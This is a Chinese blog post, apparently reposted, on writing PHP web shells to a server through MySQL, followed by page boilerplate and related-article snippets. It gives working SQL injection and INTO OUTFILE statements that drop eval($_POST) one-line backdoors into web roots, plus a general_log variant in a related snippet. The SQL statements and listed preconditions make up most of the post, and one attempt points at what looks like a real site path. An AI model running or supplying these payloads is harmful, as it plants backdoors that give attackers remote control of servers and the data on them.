MYSQL写shell

最新推荐文章于 2024-03-20 08:01:11 发布
最新推荐文章于 2024-03-20 08:01:11 发布
阅读量638 收藏 1
点赞数
文章标签: 数据库 shell php
原文链接:http://www.cnblogs.com/fengshui/p/9265534.html
版权

利用需要满足以下条件:

  1. root权限
  2. GPC关闭(能使用单引号)
  3. 有绝对路径(读文件可以不用,写文件必须)
  4. 没有配置–secure-file-priv
  5. 成功条件:有读写的权限,有create、insert、select的权限


Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES('<? php eval_r($_POST[cmd]);?>'); //把一句话木马插入到temp表
Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
Drop TABLE IF EXISTS temp; //删除temp



UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。
也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。

1、union写shell
id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’

no union

id=2) into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’ fields terminated by ‘<? phpinfo(); ?>’

如select * from users into outfile 'c:\1.txt' fields terminated by "<? phpinfo(); ?>"

没成功,应该是转义的问题
接着尝试:

select'<?php @eval($_POST[-77]);?>'INTO OUTFILE 'E:\\Web\\xxx.xx.vn\\wp-content\\errors.php'



有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:

2、查询写马
Select '<? php eval_r($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

 

 

3、mysql插入写马

 

USEtest;# MySQL 返回的查询结果为空(即零行)。
DROPTABLEIFEXISTStemp;# MySQL 返回的查询结果为空(即零行)。
CREATETABLEtemp(

 

cmdTEXTNOTNULL

);# MySQL 返回的查询结果为空(即零行)。
INSERTINTOtemp(cmd)
VALUES(

'<?php @eval($_POST['pass']);?>'

);# 影响列数: 1
SELECTcmd
FROMtemp
INTOOUTFILE'/home/htdocs/eval.php';# 影响列数: 1
DROPTABLEIFEXISTStemp;# MySQL 返回的查询结果为空(即零行)。

转载于:https://www.cnblogs.com/fengshui/p/9265534.html

weixin_30412167
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysqlshell
weixin_47385895的博客
08-22 1847
mysql常见shell方法
mysqlshell小技巧
weixin_30595035的博客
06-19 206
set global general_log=on;set @file=0x653A2F2F7777772F2F782E706870;set global general_log_file=@file;set global general_log=off; 转载于:https://www.cnblogs.com/websecyw/p/9200468.html
MySQLshell的问题
m0_62207482的博客
03-20 652
disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_ope n,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source`,但是可 以用dl扩展执行命令或者ImageMagick漏洞。secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4676
MySQL注入点,用工具对目标站点入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `入的那个路径要有入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
Mysqlshell的几种方式
Redredredfish的博客
08-23 7588
Mysqlshell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfileshell 尝试通过outfile入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
mysqlshell,mysql多语句shell
weixin_39760919的博客
03-23 81
mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D2...
mysql备份shell脚本
06-10
mysql备份支持全量、日志备份
mysql-shell
最新发布
04-04
用来搭建集群的
mysql连接shell
10-12
mysqlshell命令导出数据,执行存储过程
mysql shell安装脚本
03-18
mysql shell安装脚本
shell的多线程&当前文件夹下批量插入MySQL
09-30
shell的多线程,以及使用多线程编shell脚本实现当前文件夹下批量插入MySQL
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
mysqlShell小技巧_mysqlshell有几种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
06-21 437
1.Mysql数据库支持union的时候文件小技巧: 采用常规的union入,可以看到前面的字段占位数肯定也会被入,替换成null也是一样的结果,这个对于shell没啥大碍,mysqlShell小技巧,但是如果用来bat,mof,vbs等文件就会出问题了,那么怎么去掉这个只入我们需要的内容呢?采用hex编码就好了。
mysql 注入shell_mysql 堆注入shell
weixin_31001855的博客
01-19 271
如果一个平台有注入点的时候可以通过一句话拿shell条件1.myql 5.6.34 版本区分2.有的权限3.知道绝对路径MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就不能导出文件,以下都建立在secure_file_priv 的默认值被修改为无才能利用,且这个只能手工修改配置...
mysql 堆注入shell
weixin_30673715的博客
06-13 415
如果一个平台有注入点的时候可以通过一句话拿shell 条件 1.myql 5.6.34 版本区分 2.有的权限 3.知道绝对路径 MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就不能导出文件,以下都建立在 secure_file_priv 的默认...
mysqlshell_基于mysql下的几种shell方法
weixin_35212670的博客
01-18 2915
0x00关于mysql下的shell方法网上基本很多了,我原本也没打算总结总结的,毕竟网上已经很多了,不过在看 kilon 大佬的博客的时候,给我的感受就是明明一个几句话的东西,总能详细的,有条有理的记录下来,所以也正是如此,才有了这篇文章。0x01利用条件数据库当前用户为root权限知道当前网站的绝对路径PHP的GPC为 off状态入的那个路径存在入权限0x02基于联合查询法下的两个入方...
mysql 插件_技术分享 | 如何编 MySQL Shell 插件
weixin_29664739的博客
02-05 84
作者:洪斌爱可生南区负责人兼技术服务总监,MySQL ACE,擅长数据库架构规划、故障诊断、性能优化分析,实践经验丰富,帮助各行业客户解决 MySQL 技术问题,为金融、运营商、互联网等行业客户提供 MySQL 整体解决方案。本文来源:转载自公众号-玩转MySQL*爱可生开源社区出品,原创内容未经授权不得随意使用,转载请联系小编并注明来源。MySQL Shell 现在不只是用来部署 InnoDB...
shell中读mysql数据库
pyzheng的专栏
03-13 223
[url]http://mingxinglai.com/cn/2013/01/use-mysql-in-shell/[/url]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值